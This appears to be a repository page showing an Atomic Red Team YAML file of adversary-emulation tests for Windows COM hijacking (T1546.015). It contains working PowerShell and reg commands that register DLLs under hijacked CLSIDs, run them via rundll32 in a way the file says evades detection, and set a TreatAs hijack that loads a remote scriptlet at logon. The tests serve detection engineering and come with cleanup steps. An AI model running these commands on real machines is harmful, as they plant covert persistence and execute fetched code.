security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1546.015/T1546.015.yaml
T
Carrie Roberts d4709021fb Handle spaces in file paths (#2535) 
* updating atomics count in README.md [ci skip]

* wip

* handle spaces in path

* update readme

* fix typo

---------

Co-authored-by: publish bot <opensource@redcanary.com>
2023-09-22 10:47:25 -06:00

141 lines
7.8 KiB
YAML
Raw Permalink Blame History

attack_technique: T1546.015
display_name: 'Event Triggered Execution: Component Object Model Hijacking'
atomic_tests:
- name: COM Hijacking - InprocServer32
auto_generated_guid: 48117158-d7be-441b-bc6a-d9e36e47b52b
description: |-
This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.
Reference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
supported_platforms:
- windows
input_arguments:
clsid_threading:
description: Threading Model
type: string
default: Apartment
dllpath:
description: Path to the DLL.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\AtomicTest.dll
clsid:
description: Class ID to hijack.
type: string
default: '{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'
clsid_description:
description: Description for CLSID
type: string
default: MSAA AccPropServices
dependency_executor_name: powershell
dependencies:
- description: DLL For testing
prereq_command: 'if (Test-Path "#{dllpath}") {exit 0} else {exit 1}'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}"
executor:
command: |-
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value "#{dllpath}"
New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-sta #{clsid}'
cleanup_command: |-
Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
name: powershell
- name: Powershell Execute COM Object
auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb
description: |-
Use the PowerShell to execute COM CLSID object.
Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/
supported_platforms:
- windows
executor:
command: |
$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
$item = $o.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
cleanup_command: |
Get-Process -Name "*calc" | Stop-Process
name: powershell
- name: COM Hijacking with RunDLL32 (Local Server Switch)
auto_generated_guid: 123520cc-e998-471b-a920-bd28e3feafa0
description: |-
This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via "rundll32.exe -localserver [clsid]".
This method is generally used as an alternative to 'rundll32.exe -sta [clsid]' to execute dll's while evading detection.
Reference: https://www.hexacorn.com/blog/2020/02/13/run-lola-bin-run/
Upon successful execution of this test with the default options, whenever certain apps are opened (for example, Notepad), a calculator window will also be opened.
supported_platforms:
- windows
input_arguments:
clsid_threading:
description: Threading Model
type: string
default: Both
dll_path:
description: Path to the DLL.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\T1546.015_calc.dll
clsid:
description: Class ID to hijack.
type: string
default: '{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'
clsid_description:
description: Description for CLSID
type: string
default: MSAA AccPropServices
dependency_executor_name: powershell
dependencies:
- description: DLL For testing
prereq_command: 'if (Test-Path "#{dll_path}") {exit 0} else {exit 1}'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "#{dll_path}"
executor:
command: |-
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value "#{dll_path}"
New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-localserver #{clsid}'
cleanup_command: |-
Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
name: powershell
- name: COM hijacking via TreatAs
auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
description: |-
This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
References:
https://youtu.be/3gz1QmiMhss?t=1251
https://github.com/enigma0x3/windows-operating-system-archaeology
supported_platforms:
- windows
executor:
command: |-
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\WINDOWS\system32\scrobj.dll" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
rundll32.exe -sta "AtomicTest"
cleanup_command: |-
reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
name: powershell
Reference in New Issue View Git Blame Copy Permalink